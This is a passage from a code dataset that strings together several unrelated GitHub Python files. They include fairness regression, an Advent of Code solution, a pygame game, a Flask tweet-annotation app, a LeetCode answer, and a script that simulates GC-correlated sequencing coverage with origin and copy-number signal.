np.c_[trainS, self.trainX2] #use S and X2 (not used currently...)\r\n X1_hat_tmp = []\r\n self.train_X1_resid(trainX1, trainS_X2, trainS, lr1, use_X2 = False)\r\n train_X1_resid = self.get_X1_resid(lr1, trainX1, trainS, trainS_X2, use_X2 = False)\r\n X1_std = [np.std(train_X1_resid[:,j]) for j in range(len(self.trainX1[0]))]\r\n for j in range(len(self.trainX1[0])):\r\n train_X1_resid[:,j] = train_X1_resid[:,j] / X1_std[j]\r\n trainX_rn = copy.deepcopy(train_X1_resid) #self.trainX1\r\n\r\n for i in range(trainX_rn.shape[1]):\r\n trainX_rn[:,i] = trainX_rn[:,i] - np.mean(train_X1_resid[:,i])\r\n trainS_n = copy.deepcopy(trainS)\r\n for j in range(len(trainS[0])):\r\n trainS_n[:,j] = trainS[:,j] - np.mean(trainS[:,j])\r\n trainY_n = self.trainY - np.mean(self.trainY)\r\n\r\n validS, validX1, validX2, validY = self.getValidationData()\r\n if rff:\r\n validX1 = sampler_x.transform(validX1)\r\n if transform_s:\r\n validS = sampler_s.transform(validS)\r\n for j in range(len(trainS[0])):\r\n validS[:,j] = validS[:,j] / S_std[j]\r\n validS_X2 = np.c_[validS, validX2] #use S and X2\r\n valid_X1_resid = self.get_X1_resid(lr1, validX1, validS, validS_X2, use_X2 = False)\r\n valid_n = len(validS)\r\n for j in range(len(self.trainX1[0])):\r\n valid_X1_resid[:,j] = valid_X1_resid[:,j] / X1_std[j]\r\n validX_rn = valid_X1_resid #self.trainX1\r\n for i in range(train_X1_resid.shape[1]):\r\n validX_rn[:,i] = validX_rn[:,i] - np.mean(train_X1_resid[:,i])\r\n validS_n = copy.deepcopy(validS)\r\n for j in range(len(trainS[0])):\r\n validS_n[:,j] = validS[:,j] - np.mean(trainS[:,j])\r\n validY_n = validY - np.mean(self.trainY)\r\n testS, testX1, testX2, testY = self.getPredictData()\r\n if rff:\r\n testX1 = sampler_x.transform(testX1)\r\n if transform_s:\r\n testS = sampler_s.transform(testS)\r\n for j in range(len(trainS[0])):\r\n testS[:,j] = testS[:,j] / S_std[j]\r\n testS_X2 = np.c_[testS, testX2] #use S and X2\r\n test_X1_resid = self.get_X1_resid(lr1, testX1, testS, testS_X2, use_X2 = False)\r\n for j in range(len(self.trainX1[0])):\r\n test_X1_resid[:,j] = test_X1_resid[:,j] / X1_std[j]\r\n test_n = len(testS)\r\n testX_rn = test_X1_resid #self.trainX1\r\n for i in range(train_X1_resid.shape[1]):\r\n testX_rn[:,i] = testX_rn[:,i] - np.mean(train_X1_resid[:,i])\r\n testS_n = copy.deepcopy(testS)\r\n for j in range(len(trainS[0])):\r\n testS_n[:,j] = testS[:,j] - np.mean(trainS[:,j])\r\n testY_n = testY - np.mean(self.trainY)\r\n\r\n Vs = np.cov(trainS_n.T)\r\n Vx = np.cov(trainX_rn.T)\r\n vs = np.matmul(trainS_n.T, trainY_n)/NTrain\r\n vx = np.matmul(trainX_rn.T, trainY_n)/NTrain\r\n def linearKernel(): return ( lambda x,y:np.dot(x,y) )\r\n def rbfKernel(gamma): return ( lambda x,y:math.exp(-gamma*np.inner(x-y,x-y)) )\r\n def polyKernel(gamma): return ( lambda x,y:(gamma*np.inner(x,y)+1.0)**3 )\r\n if not is_kernel: #Linear\r\n sol = self.Fair_Prediction_Optimization(eps, lmd/NTrain, Vs, Vx, vs, vx) #main optimization\r\n train_S_X1_resid = np.c_[trainS_n, trainX_rn]\r\n trainYhat = [np.dot(sol,train_S_X1_resid[i]) for i in range(NTrain)]\r\n valid_S_X1_resid = np.c_[validS_n, validX_rn]\r\n validYhat = [np.dot(sol,valid_S_X1_resid[i]) for i in range(valid_n)]\r\n test_S_X1_resid = np.c_[testS_n, testX_rn]\r\n testYhat = [np.dot(sol,test_S_X1_resid[i]) for i in range(test_n)]\r\n\r\n result_train = Result(self.trainY, trainYhat + np.mean(self.trainY), self.trainS, avails) \r\n result_valid = Result(validY, validYhat + np.mean(self.trainY), self.validS, avails) \r\n result_test = Result(testY, testYhat + np.mean(self.trainY), self.testS, avails) \r\n else: #Kernel\r\n ks = rbfKernel(gamma)\r\n kx = rbfKernel(gamma)\r\n n = NTrain\r\n subsampling_ratio = 1.0 #0.1\r\n n_sub = int(n*subsampling_ratio)\r\n if subsampling_ratio < 1.0:\r\n sample_ids = self.subsample_from_levscore(ks, kx, trainS_n, trainX_rn, gamma, 0.05, subsampling_ratio)\r\n else:\r\n sample_ids = [i for i in range(n)]\r\n\r\n Ks, Kx = np.zeros((n_sub, n_sub)), np.zeros((n_sub, n_sub))\r\n trainS_n_sub = trainS_n[sample_ids]\r\n trainX_rn_sub = trainX_rn[sample_ids]\r\n trainY_n_sub = trainY_n[sample_ids]\r\n for i in range(n_sub):\r\n for j in range(n_sub):\r\n Ks[i,j], Kx[i,j] = ks(trainS_n_sub[i],trainS_n_sub[j]), kx(trainX_rn_sub[i],trainX_rn_sub[j])\r\n sol = self.Fair_Prediction_Kernel_Optimization(eps, lmd, Ks, Kx, trainS_n_sub, trainX_rn_sub, trainY_n_sub)\r\n\r\n trainYhat = np.matmul(Ks, sol[:n_sub]) + np.matmul(Kx, sol[n_sub:])\r\n valid_n = len(validS)\r\n Ks_valid, Kx_valid = np.zeros((valid_n, n_sub)), np.zeros((valid_n, n_sub))\r\n for i in range(valid_n):\r\n for j in range(n_sub):\r\n Ks_valid[i,j], Kx_valid[i,j]\\\r\n = ks(validS_n[i],trainS_n_sub[j]), kx(validX_rn[i],trainX_rn_sub[j])\r\n validYhat = np.matmul(Ks_valid, sol[:n_sub]) + np.matmul(Kx_valid, sol[n_sub:])\r\n test_n = len(testS)\r\n Ks_test, Kx_test = np.zeros((test_n, n_sub)), np.zeros((test_n, n_sub))\r\n for i in range(test_n):\r\n for j in range(n_sub):\r\n Ks_test[i,j], Kx_test[i,j]\\\r\n = ks(testS_n[i],trainS_n_sub[j]), kx(testX_rn[i],trainX_rn_sub[j])\r\n testYhat = np.matmul(Ks_test, sol[:n_sub]) + np.matmul(Kx_test, sol[n_sub:])\r\n\r\n result_train = Result(self.trainY[sample_ids], trainYhat + np.mean(self.trainY[sample_ids]), self.trainS[sample_ids], avails) \r\n result_valid = Result(validY, validYhat + np.mean(self.trainY), validS, avails) \r\n result_test = Result(testY, testYhat + np.mean(self.trainY), testS, avails) \r\n\r\n return result_train, result_valid, result_test\r\n\r\n\r\n\r\n","repo_name":"jkomiyama/fairregresion","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":24675,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"28385142743","text":"from collections import defaultdict\n\nclass Polymerization:\n def __init__(self):\n\n self.pairs = {}\n self.polymer_template = []\n self.current_pairs = defaultdict(int)\n self.char_freq = defaultdict(int) \n\n \n def add_pair(self, point: list) -> None:\n self.pairs[point[0]] = point[1]\n\n def initial_pairs(self):\n for c in range(0, len(self.polymer_template) - 1):\n pair = self.polymer_template[c] + self.polymer_template[c + 1]\n self.current_pairs[pair] += 1\n\n def make_new_pairs(self):\n new_pairs = defaultdict(int)\n for pair in self.current_pairs:\n new_polymer = self.pairs[pair]\n \n new_pair_1 = pair[0] + new_polymer\n new_pair_2 = new_polymer + pair[1]\n \n new_pairs[new_pair_1] += self.current_pairs[pair]\n new_pairs[new_pair_2] += self.current_pairs[pair]\n \n self.char_freq[new_polymer] += self.current_pairs[pair]\n self.current_pairs = new_pairs\n\n\n def freq(self):\n for c in self.polymer_template:\n self.char_freq[c] += 1\n\nif __name__ == \"__main__\":\n p = Polymerization()\n steps = 40\n max_freq = 0\n min_freq = 0\n\n # Read points.\n with open('2021\\Day14_input.txt') as f:\n data = [x.rstrip() for x in f.readlines()]\n for line in data:\n if line != '' and '->' not in line:\n for c in line:\n p.polymer_template.append(c)\n elif line != '':\n line = line.split(' -> ')\n p.add_pair(line)\n\n p.freq()\n p.initial_pairs()\n for c in range(steps):\n p.make_new_pairs()\n print(p.current_pairs)\n\n max_freq = max(p.char_freq.values())\n min_freq = min(p.char_freq.values())\n print(f'The max frequency is: {max_freq}')\n print(f'The min frequency is: {min_freq}')\n print(f'Most common - Least common: {max_freq - min_freq}')\n \n\n \n \n","repo_name":"Drdagost/Advent_of_Code","sub_path":"2021/Day14_2.py","file_name":"Day14_2.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8938516828","text":"import numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import StandardScaler, RobustScaler\nimport matplotlib.pyplot as plt\n\n# 一、加载数据\ndata = np.loadtxt('ex1data1.txt', delimiter=',', dtype='float64')\nX = data[:, :-1] # data[:,0:1]\ny = data[:, -1:] # data[:,1:2]\nprint(X.shape)\n\nplt.scatter(X, y)\n# plt.show()\n\nscaler = StandardScaler()\nscaler.fit(X)\n# print(scaler.mean_) 均值\n# print(scaler.scale_) 标准偏差\nX = scaler.transform(X)\n# print(X)\n\nr_scaler=RobustScaler()\nr_scaler.fit(X)\nX=r_scaler.transform(X)\n# print(X[:,0])\n# print(X[:,1])\n\ndef plot_after_feature_normalization(X):\n plt.scatter(X,y,color='r')\n plt.show()\n\nplot_after_feature_normalization(X)\n\nmodel = LinearRegression()\nmodel.fit(X, y)\n\nX_test = np.array([[1650]], dtype='float64')\nresult = model.predict(X_test)\nprint(model.coef_) # Coefficient of the features 决策函数中的特征系数\nprint(model.intercept_) # 又名bias偏置,若设置为False,则为0\nprint(result[0][0])\n","repo_name":"Christings/myMachineLearningNote","sub_path":"linear/linear_sklearn.py","file_name":"linear_sklearn.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9734401659","text":"import pygame\n\nfrom .components.player import Player\nfrom .components.bullet import Bullet\n\n\nSCREEN_WIDTH = 500\nSCREEN_HEIGHT = 500\n\nwin = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"Dual\")\n\n\ndef main():\n run = True\n clock = pygame.time.Clock()\n starting_health = 250\n p = Player(win, 0, 0, (starting_health, 0, 0), starting_health)\n p2 = Player(win, 450, 450, (0, starting_health, 0), starting_health)\n bullet = Bullet(win)\n\n while run:\n clock.tick(60)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n p.move()\n p2.move()\n\n win.fill((0, 0, 0))\n p.draw()\n p2.draw()\n\n if bullet.is_ready():\n bullet.set_movement(\n p2.x + 22.5,\n p2.y,\n p2.velx,\n 6\n )\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_SPACE] and bullet.is_ready():\n bullet.ready = False\n bullet.draw()\n\n if not bullet.is_ready():\n bullet.draw()\n bullet.move()\n if bullet.y + 5 >= p.y and bullet.y < p.y + 50:\n if bullet.x + 5 >= p.x and bullet.x < p.x + 50:\n p.health -= 50\n p.colors = (p.health, 0, 0)\n bullet.ready = True\n\n pygame.display.update()\n\n if p.health <= 0:\n pygame.quit()\n\n\nmain()\n","repo_name":"DaleNaci/Dual","sub_path":"data/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32147070178","text":"import time\nimport threading\nimport bin.my_lib.receiver3 as receiver\nimport bin.settings as settings\nWHERE = \"bin.units\"\n\n'''\ndef print_local_files():\n while True:\n printer.print_local_task(\"c:\\\\printer\\\\local_task\\\\\")\n time.sleep(2) # 2秒扫描一次文件夹\n\n\ndef print_received_files():\n while True:\n try:\n user_list = os.listdir(WORK_PATH) # 持续地获取传输文件夹的文件列表\n print(\"main:当前收到的文件有:\\n\", user_list)\n for user in user_list:\n registered_user = re.match('^1[0-9]{10}$', user) # 判断文件夹是否符合命名规则\n task_list = os.listdir(os.path.join(WORK_PATH, user))\n for task in task_list:\n print(\"main:正在扫描received_files\")\n file_list = os.listdir(os.path.join(WORK_PATH, user, task))\n if registered_user and ('info.json' in file_list):\n task_abspath = os.path.join(WORK_PATH, user, task)\n info = json_read_write.read(os.path.join(task_abspath, \"info.json\")) # 获取info信息\n status = info['user']['status']\n print(\"-------------------------\")\n if status == 'received': # 判断文件是否传输完毕\n print(\"main:received\")\n print(\"main:\" + task + \"的所有文件已经传输完毕,开始打印\")\n # change_json(\"C:\\\\printer\", \"config.json\", config)\n print(task_abspath)\n printer.print_files(task_abspath + '\\\\')\n # 打印task目录下的文档,只需向printer函数提交一个绝对路径就可\n # 以打印该目录所有的文档\n message = '用户%s已经打印' % task\n win32api.MessageBox(0, message, '提示信息', 1)\n info['user']['status'] = 'printing' # 把处理状态修改为printing\n print('main:当前目录为:', os.getcwd())\n # change_json(task_abspath, 'info.json', info)\n json_read_write.write(os.path.join(task_abspath, \"info.json\"), info) # 写入info信息,修改status的状态\n elif status == 'receiving':\n print(\"main:用户:%s的文件尚未传输完毕,暂不打印\" % task)\n elif status == 'printed':\n print(\"main:用户:%s的文件打印完毕,无需处理\" % task)\n \"\"\"\n elif status == 'printing':\n if printer.task():\n print(\"main:用户:%s的文件正在打印,无需处理\" % task)\n else:\n print(\"main:用户:%s的文件打印完毕,移至printed文件夹\" % task)\n printed_info = get_json(os.path.join(WORK_PATH, user, task), \"info.json\")\n serial_number = printed_info[\"serial_number\"]\n os.mkdir(\"C:\\\\printer\\\\printed\\\\\" + serial_number) # 创建用任务号命名的文件夹\n shutil.move(os.path.join(WORK_PATH, user, task),\n \"c:\\\\printer\\\\printed\\\\%s\" % serial_number) \n \"\"\"\n except:\n print(\"main:打印收到文件出错\")\n time.sleep(10) # 两秒扫描一次文件目录\n'''\n\n\nclass ThreadReceiver(threading.Thread):\n # 下载模块\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.SWITCH = True\n\n def receiver(self):\n # 每10秒从服务器获取一次文件\n while self.SWITCH:\n print(WHERE, \"开始执行下载程序\")\n receiver.start()\n print(WHERE, \"下载程序执行完毕\")\n time.sleep(10)\n\n def run(self):\n print(WHERE, self.name, \"线程开始\")\n self.receiver()\n print(WHERE, self.name, \"线程已结束\")\n\n def stop(self):\n self.SWITCH = False\n\n\n'''\nclass ThreadPrintReceived (threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n print (\"main:开始线程:\" + self.name)\n manager.print_received_files()\n\n\nclass ThreadPrintLocal (threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n print (\"main:开始线程:\" + self.name)\n manager.print_local_files()\n'''\n\n# 线程1:接收服务器的文件\n# receiver1 = ThreadReceiver(1, \"receiver\")\n# receiver1.start()\n# 线程2:打印接收完毕的文件\n# print_thread1 = ThreadPrintReceived(1, \"print_receive_files\")\n# print_thread1.start()\n# 线程3:打印local_task的文件\n# local_print_thread1 = ThreadPrintLocal(1, \"print_local_files\")\n# local_print_thread1.start()","repo_name":"ziqiangxu/cloud-printing-client","sub_path":"bin/units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"23774146591","text":"'''\nBest Time to Buy and Sell Stock with Cooldown\n\nSolution\nYou are given an array prices where prices[i] is the price of a given stock on the ith day.\n\nFind the maximum profit you can achieve. You may complete as many transactions as you like (i.e., buy one and sell one share of the stock multiple times) with the following restrictions:\n\nAfter you sell your stock, you cannot buy stock on the next day (i.e., cooldown one day).\nNote: You may not engage in multiple transactions simultaneously (i.e., you must sell the stock before you buy again).\n\n \n\nExample 1:\n\nInput: prices = [1,2,3,0,2]\nOutput: 3\nExplanation: transactions = [buy, sell, cooldown, buy, sell]\nExample 2:\n\nInput: prices = [1]\nOutput: 0\n \n\nConstraints:\n\n1 <= prices.length <= 5000\n0 <= prices[i] <= 1000\n'''\n#top down memo, accepted\n# class Solution:\n# def maxProfit(self, prices: [int]) -> int:\n# l = len(prices)\n# dp = [[0]*2 for _ in range(l)]\n# def helper(i, buy):\n# if i >= l: return 0\n# if dp[i][buy] > 0: return dp[i][buy]\n# if buy:\n# dp[i][buy] = max(-prices[i]+helper(i+1, 0), helper(i+1, 1))\n# else:\n# dp[i][buy] = max(prices[i]+helper(i+2, 1), helper(i+1, 0))\n# return dp[i][buy]\n\n# return helper(0, 1)\n\n#bottom up dp\nclass Solution:\n def maxProfit(self, prices: [int]) -> int:\n l = len(prices)\n dp = [[0]*2 for _ in range(l+2)]\n for i in range(l-1, -1, -1):\n for buy in range(2):\n if buy:\n dp[i][buy] = max(-prices[i]+dp[i+1][0], dp[i+1][1])\n else:\n dp[i][buy] = max(prices[i]+dp[i+2][1], dp[i+1][0])\n return dp[0][1]\n\nprices = [1,2,3,0,2]\n# Output: 3\n\n# prices = [1]\n# Output: 0\n\nsol = Solution()\nprint(sol.maxProfit(prices))\n","repo_name":"jomesh18/Leetcode","sub_path":"DP/maxProfit2.py","file_name":"maxProfit2.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"46052067540","text":"import json\nimport os.path\n\nfrom flask import Flask, render_template, request\nfrom multiprocessing import Value\n\nimport utils.paths as paths\nfrom annotator.annotate import reverse_label\nfrom utils.annotation_keys import TESTIMONY\nfrom utils.file_utils import read_tweet_from_path_and_index\n\ncounter = Value('i', 0)\napp = Flask(__name__)\nstored_data = []\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n\n done_ids = extract_done_ids_from_output_file(paths.OUTPUT_DATA_FILE)\n tweet = read_tweet_from_path_and_index(paths.INPUT_DATA_FILE, counter.value)\n\n # Listen for user input on saving data\n if request.method == \"POST\":\n if request.form['submit_button'] == 'save':\n write_entries_to_file(paths.OUTPUT_DATA_FILE, stored_data)\n stored_data.clear()\n\n # read through file to find tweet not already done\n while tweet and tweet.get('id') in done_ids:\n counter.value += 1\n tweet = read_tweet_from_path_and_index(paths.INPUT_DATA_FILE, counter.value)\n\n # variable for the progress bar\n len_progress_bar = calculate_progress_bar(paths.INPUT_DATA_FILE)\n\n # end of file reached\n if not tweet:\n return render_template(\n 'end.html',\n end_of_file_message=\"Good job !\"\n )\n\n # all info about the tweet\n label = TESTIMONY\n tweet_id = tweet.get('id')\n tweet_text = tweet.get('text')\n tweet_english_text = tweet.get('en_text')\n\n # user input in one of the three action buttons\n if request.method == \"POST\":\n if request.form['submit_button'] in ['accept', 'reject', 'pass']:\n if request.form['submit_button'] == 'accept':\n tweet.update({'label': label})\n elif request.form['submit_button'] == 'reject':\n tweet.update({'label': reverse_label(label)})\n elif request.form['submit_button'] == 'pass':\n tweet.update({'flag': 'problematic'})\n stored_data.append(tweet)\n with counter.get_lock():\n counter.value += 1\n out = counter.value\n tweet = read_tweet_from_path_and_index(paths.INPUT_DATA_FILE, out)\n if not tweet:\n return render_template(\n 'end.html',\n end_of_file_message=\"Good job !\"\n )\n return render_template(\n 'base.html',\n tweet_id=tweet.get('id'),\n tweet_text=tweet.get('text'),\n tweet_english_text=tweet.get('en_text'),\n tweet_french_text=tweet.get('fr_text'),\n label=label,\n index_progress=out,\n progress_bar=len_progress_bar\n )\n\n elif request.form['submit_button'] == \"revert\":\n if counter.value != 0:\n if stored_data:\n stored_data.pop(-1)\n with counter.get_lock():\n counter.value -= 1\n out = counter.value\n tweet = read_tweet_from_path_and_index(paths.INPUT_DATA_FILE, out)\n return render_template(\n 'base.html',\n tweet_id=tweet.get('id'),\n tweet_text=tweet.get('text'),\n tweet_english_text=tweet.get('en_text'),\n tweet_french_text=tweet.get('fr_text'),\n label=label,\n index_progress=out,\n progress_bar=len_progress_bar\n )\n\n return render_template(\n 'base.html',\n tweet_id=tweet_id,\n tweet_text=tweet_text,\n tweet_english_text=tweet_english_text,\n tweet_french_text=tweet.get('fr_text'),\n label=label,\n index_progress=counter.value,\n progress_bar=len_progress_bar\n )\n\n\ndef calculate_progress_bar(file_path):\n with open(file_path, 'r') as input_file:\n return len(input_file.readlines())\n\n\ndef write_entries_to_file(file_path, buffer):\n with open(file_path, 'a') as output_file:\n for tweet in buffer:\n output_file.write(json.dumps(tweet) + \"\\n\")\n\n\ndef extract_done_ids_from_output_file(file_path):\n done_ids = []\n with open(file_path, 'a+') as output_file:\n output_file.seek(0)\n for line in output_file.readlines():\n done_ids.append(json.loads(line).get('id'))\n return done_ids\n","repo_name":"RandomJungle/meTooAnnotation","sub_path":"interface/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24725736776","text":"#goal: given a simple string type math function (like '((1+2)/(3+4))'), calculate it.\n\n#code:\nimport operator \ndef string_math(str):\n operands = []\n operators = []\n ops = {'+':operator.add, '-':operator.sub, '*':operator.mul, '/':operator.truediv}\n for term in str:\n if term == '(': #it means start a calculation\n continue\n elif term == ')':\n right, left = operands.pop(), operands.pop()\n operands.append(ops[operators.pop()](left,right))\n elif term in ops:\n operators.append(term)\n else:\n operands.append(int(term))\n return operands[0]\n \n","repo_name":"WideSu/Python","sub_path":"02. DataStructure/03. queue_stack/07. string_math.py","file_name":"07. string_math.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28778520280","text":"import tkinter.filedialog\nfrom typing import Optional\n\n\ndef open_file_dialog(\n filetypes: list[tuple[str, str]],\n title: Optional[str] = \"Select A File\",\n initialdir: Optional[str] = \"/\") -> str:\n \"\"\"\n Opens a file dialog and returns the selected file (restricted to the given filetypes).\n :param title: title of the file dialog\n :param filetypes: list o selectable file types\n :param initialdir: initial file dialog directory\n :return: selected file\n \"\"\"\n return tkinter.filedialog.askopenfilename(\n initialdir=initialdir, title=title, filetypes=filetypes\n )\n\n\ndef get_path_dialog(\n filetypes: list[tuple[str, str]],\n initialfile: str = \"\",\n title: Optional[str] = \"Select A Path\",\n initialdir: Optional[str] = \"/\") -> str:\n \"\"\"\n Opens a file dialog and returns the selected path and the selected filename (restricted to the given filetypes).\n :param filetypes: list o selectable file types\n :param initialfile: initial file name\n :param title: title of the file dialog\n :param initialdir: initial file dialog directory\n :return: selected path and file name\n \"\"\"\n return tkinter.filedialog.asksaveasfilename(\n title=title,\n filetypes=filetypes,\n initialdir=initialdir,\n initialfile=initialfile\n )\n","repo_name":"Mova801/nextqr","sub_path":"new/libs/filedialog_manager.py","file_name":"filedialog_manager.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"688063557","text":"#!/usr/bin/env python2.7\nimport sys, argparse, pybedtools, scipy.stats\nfrom collections import defaultdict\nimport numpy as np\n\nparser = argparse.ArgumentParser(description=\"\"\"\n\n Given gc.bedGraph (chr, start, end, pct_gc)\n Generate a corresponding gc_fe_table.txt: chr, start, end, gc, treatcov, controlcov, fe\n\n Typical procedure beforehand:\n\n bedtools makewindows -g hg19.genome -w 100 -s 100 | bedtools intersect -v -a - -b excludedregions.bed | awk '$3-$2 == 100 {OFS=\"\\t\"; print $1,$2,$3}' | bedtools nuc -fi hg19.fa -bed - | awk '!/^#/ {OFS=\"\\t\"; print $1,$2,$3,$5}' > gc.bedGraph\n\n Output header: chr, start, end, pct_gc, test_value, control_value, test/control value (FE), label, [CNV if used]\n\n \n \"\"\", formatter_class= argparse.RawTextHelpFormatter)\nparser.add_argument('--table', '-i', '-f',\n type= str,\n help='''Path to gc.bedGraph.''')\nparser.add_argument('--gccol', \n type=int, default=4,\n help='''Assuming gc.bedGraph, default is 4. Change if necessary.''')\nparser.add_argument('--mincov', \n type=float, default=2**-8,\n help='''Min cov in bin for both treat and control. Default=2**-8.''')\n\nparser.add_argument('--addorisignal', '-a', \n type=str, default=False,\n help='''Add origin signal to bins. Begin on avg ever Nth bin and extend for M bins on avg. Provide comma-separated N,M -- suggestion for 100 bp bins = 300,10''')\n\nparser.add_argument('--orisignalparams', '-p', \n type=str, default='20,3',\n help='''If adding origin signal to bins, this controls mean and stdev of additional signal. default = 20,3 ''')\n\n## TODO: use 'enrichment' instead of 'ori' -- as this can be thought of more generally than ORIs or NS-seq\n##parser.add_argument('--addenrichmentsignal', '-a', \n## type=str, default=False,\n## help='''Add enrichment signal to bins. Begin on avg ever Nth bin and extend for M bins on avg. Provide comma-separated N,M -- suggestion for 100 bp bins = 300,10''')\n##\n##parser.add_argument('--enrichmentsignalparams', '-p', \n## type=str, default='20,3',\n## help='''If adding enrichment signal to bins, this controls mean and stdev of additional signal. default = 20,3 ''')\n\n\nparser.add_argument('--addcnvsignal', '-c', \n type=str, default=False,\n help='''Add or subtract signal to/from bins corresponding to gains or losses in copy number.\nBegin on avg ever Xth bin and extend for Y bins on avg. Provide comma-separated X,Y.\nSuggestion for 100 bp bins = 20000,1000 -- meaning you expect a 100 kb CNV every 2 Mb.\nNote - this adds CNV signal de novo to the signal being generated.\nHowever, it may be desired to add CNV signal in the same locations across multiple runs of this script.\nIf so, use --cnvlocations with path to desired alread-simulated signal+CNV file that had CNVs put in the last column.\nUse --cnvcol to specify different column if it is not column 9.\nBe conscious of avoiding using --addcnvsignal and --cnvlocations together -- i.e. don't do it unless intentionally adding CNVs on top of CNVs.\nNote though that it currently will not provide the correct CNV copy number in the last column if making CNVs on top of CNVs.\n\nUpdate: script has been altered such that if cnvlocations specified, then it will not also add more cnv signal...''')\n\nparser.add_argument('--cnvparams', '-P', \n type=str, default='2,8,0.5',\n help='''If adding CNV signal to bins, this controls the range of how large a gain or loss can be and the probability of gain (complement is prob of loss).\nProvide comma-sep list as min,max,prob. default = 2,8,0.5 meaning you expect gains/losses ranging from 2-8-fold and expect gains to be equally likely as losses.''')\n\nparser.add_argument('--cnvlocations', '-C', \n action='store_true', default=False,\n help='''This tells the script that, for the --table argument, instead of giving a normal gc.bedGraph,\nyou have provided path to a file previously generated by this script using --addcnvsignal.\nThis will use the same copy numbers reported in that file.\nIt assumes the gccol=4 and cnvcol=9. Use --gccol and --cnvcol to alter.''')\n\nparser.add_argument('--cnvcol', \n type=int, default=9,\n help='''''')\n\n\nargs = parser.parse_args()\n\n\ngc2felist = defaultdict(list)\n\n\n\n################################################################ \n################ PROCESS ARGS IF NEED BED ######################\n################################################################\n''' Adjust column indexes to Python speak'''\ngccol=args.gccol-1\ncnvcol=args.cnvcol-1\n\n''' Take care of enrichment parameters if need be'''\nif args.addorisignal:\n N, M = (int(e) for e in args.addorisignal.strip().split(','))\n in_ori_prob = 1.0/N\n leave_ori_prob = 1.0/M\n in_origin = np.random.binomial(1, in_ori_prob)\n orimu, oristd = (float(e) for e in args.orisignalparams.strip().split(','))\n\n\n''' Take care of CNV parameters if need be'''\nif args.addcnvsignal:\n X, Y = (int(e) for e in args.addcnvsignal.strip().split(','))\n in_cnv_prob = 1.0/X\n leave_cnv_prob = 1.0/Y\n in_cnv = np.random.binomial(1, in_cnv_prob)\n cnv_min, cnv_max, cnv_is_gain_prob = (float(e) for e in args.cnvparams.strip().split(','))\n cnv_is_gain = np.random.binomial(1, cnv_is_gain_prob)\n cnv_magnitude = np.random.randint(cnv_min, cnv_max)\n if in_cnv:\n if cnv_is_gain:\n cnv_copy_num = 1.0 * cnv_magnitude\n else: #loss\n cnv_copy_num = 1.0 / cnv_magnitude\n else:\n cnv_copy_num = 1.0\n cnv_tag = str(cnv_copy_num)\n\n\n\n################################################################\n########################## EXECUTE #############################\n################################################################\n \nwith open(args.table) as table:\n for row in table:\n if args.cnvlocations:\n whole_row = row.strip().split() ## To avoid taking the treat, control, FE, label, CNV cols from older sim_gc file (just want chr, start, end, gc)\n row = whole_row[:3] + [whole_row[gccol]]\n gc = 100*float(row[3])\n old_cnv_copy_num = float(whole_row[cnvcol])\n else:\n row = row.strip().split()\n gc = 100*float(row[gccol])\n treat = max(args.mincov, np.random.normal(gc,(gc+1e-100)**0.5))\n control = max(args.mincov, np.random.normal(1,0.05))\n region = \"bg\"\n \n if args.addorisignal: ## add enrichment signal on top of background\n if in_origin:\n region = \"origin\"\n treat += np.random.normal(orimu,oristd)\n in_origin = 1 - np.random.binomial(1, leave_ori_prob)\n else:\n in_origin = np.random.binomial(1, in_ori_prob)\n \n if args.cnvlocations: ## CNV AFTER enrichment signal added\n treat *= old_cnv_copy_num\n cnv_tag = str(old_cnv_copy_num)\n \n elif args.addcnvsignal:\n if in_cnv:\n treat *= cnv_copy_num\n control *= cnv_copy_num\n in_cnv = 1 - np.random.binomial(1, leave_cnv_prob)\n else: #not in CNV\n cnv_copy_num = 1.0 ## Was not in CNV -- need this here before re-calculat in_cnv\n in_cnv = np.random.binomial(1, in_cnv_prob)\n if in_cnv: ## to avoid calculating the next lines too often, only re-calculate when back in CNV\n cnv_is_gain = np.random.binomial(1, cnv_is_gain_prob)\n cnv_magnitude = np.random.randint(cnv_min, cnv_max)\n if cnv_is_gain:\n cnv_copy_num = 1.0 * cnv_magnitude\n else: #loss\n cnv_copy_num = 1.0 / cnv_magnitude\n cnv_tag = str(cnv_copy_num)\n fe = treat/control\n row += [str(treat), str(control), str(fe), region]\n if args.cnvlocations or args.addcnvsignal:\n row += [cnv_tag]\n print 